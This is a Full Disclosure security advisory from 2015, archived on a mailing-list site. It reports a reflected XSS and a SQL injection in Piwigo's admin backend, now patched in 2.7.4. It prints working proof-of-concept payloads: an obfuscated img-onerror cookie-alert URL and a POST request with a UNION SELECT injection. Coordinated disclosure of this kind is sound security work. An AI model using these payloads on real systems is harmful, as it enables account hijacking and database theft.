lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CALH-=7xBkyHJtpicTcXzHEdJ=kLikzvwpH4YDqKW=5_aX7=CUw@mail.gmail.com> Date: Tue, 17 Feb 2015 17:22:29 +0100 From: Steffen Rösemann <steffen.roesemann1986@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Reflecting XSS- and SQL injection-vulnerabilities in the administrative backend of Piwigo <= v. 2.7.3 Advisory: Reflecting XSS- and SQL Injection vulnerability in CMS Piwigo <= v. 2.7.3 Advisory ID: SROEADV-2015-06 Author: Steffen Rösemann Affected Software: CMS Piwigo <= v. 2.7.3 (Release date: 9th January 2015) Vendor URL: http://piwigo.org Vendor Status: patched CVE-ID: - ========================== Vulnerability Description: ========================== Piwigo <= v. 2.7.3 suffers from a reflecting XSS and a SQL injection in its administrative backend. ================== Technical Details: ================== The reflecting XSS vulnerability resides in the "page" parameter used in the file admin.php which can be found in the administrative backend located here in a common Piwigo installation: http://{TARGET}/admin.php?page=plugin-AdminTools Exploit-Example: http:// {TARGET}/admin.php?page=plugin-AdminTools%3Cimg%20src=n%20onerror=eval%28String.fromCharCode%2897,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59%29%29%20%3E The SQL injection vulnerability can as well be found in the administrative backend and can be found in the "History" functionality located here: http://{TARGET}/admin.php?page=history The SQL injection vulnerability can be exploited by appending arbitrary SQL statements in a POST request to the parameter "user": Exploit-Example: POST /piwigo/admin.php?page=history HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/piwigo/admin.php?page=history&search_id=82 Cookie: pwg_display_thumbnail=no_display_thumbnail; pwg_id=19rpao6bhdsn3l0u0o1im4m680; _pk_id.1.1fff=7588ea02f4577539.1420720532.1.1420720532.1420720532. Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 255 start=2015-01-08+&end=2015-01-09+&types%5B%5D=none&types%5B%5D=picture&types%5B%5D=high&types%5B%5D=other&user=2) AND 1=2 UNION SELECT user(),database(),3,version(),5,6,7,8,9 -- &image_id=&filename=&ip=&display_thumbnail=no_display_thumbnail&submit=Submit ========= Solution: ========= Install the latest version 2.7.4 (released 17th February 2015). ==================== Disclosure Timeline: ==================== 08-Jan-2015 – found the vulnerability 09-Jan-2015 - informed the developers 09-Jan-2015 – release date of this security advisory [without technical details] 09-Jan-2015 - vendor responded, will work on a patch (released in v. 2.7.4) 17-Feb-2015 - vendor releases patch 2.7.4 (see [3]) 17-Feb-2015 - release date of this security advisory 17-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://piwigo.org [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-06.html [3] http://piwigo.org/forum/viewtopic.php?id=25179 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists